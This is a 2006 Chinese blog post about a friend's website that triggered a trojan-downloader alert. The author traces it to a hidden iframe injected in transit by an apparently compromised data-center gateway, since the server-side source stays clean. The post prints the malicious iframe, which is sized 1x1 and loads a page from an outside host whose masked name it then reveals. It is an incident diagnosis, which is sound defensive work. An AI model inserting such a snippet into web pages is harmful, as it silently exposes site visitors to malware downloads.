Submitted by chener on 2006, December 19, 10:19 PM. 某人消息
VISON说他的网站好像有病毒,防火墙报警:木马程序 Trojan-Downloader.JS.Agent.bz.
打看一看,果然。查看代码,发现被插入:<iFrAmE SRc=http://cool.*****.com/k.htm width=1 height=1 frameborder=0></IfRaMe>
(*****部分为:47555)
先以为是程序有什么漏洞被人挂了木马,把全站拖下来查找了一番,竟然没有发现。
仔细找了几遍,发现源代码一切正常,本地访问也没有什么问题,但只要放在网上访问就会自动将代码里的<head>部分替换为恶意代码片断。
症状在于:
在服务器中用浏览器打开没有问题
直接在服务器上用编辑器查看源代码也是没有问题
但是放在网络上浏览就有问题
看来一定是机房网关被人植入木马,有数据通过时,被自动插入代码。
 |
Post by vison on 2006, December 19, 10:30 PM 
#1
Post by vison on 2006, December 19, 10:34 PM #2
Post by hvl on 2006, December 19, 11:21 PM #3
Post by 小陈故事 on 2006, December 20, 10:42 AM #4
| « 2010年09月 » | ||||||
| 日 | 一 | 二 | 三 | 四 | 五 | 六 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | ||
[... 果真大腕云集啊。甚多硬汉。... 哈... 现在还很喜欢扫片了嗦? to loky:对。。使用... [... 我是伪大师行不?新山城真的... 公家被培训,私人被照像。。 分类数量: 7 文章数量: 608 评论数量: 640 标签数量: 213 附件数量: 438 引用数量: 0 注册用户: 14 今日访问: 155 总访问量: 1401092 程序版本: 1.6
分享到新浪微博 
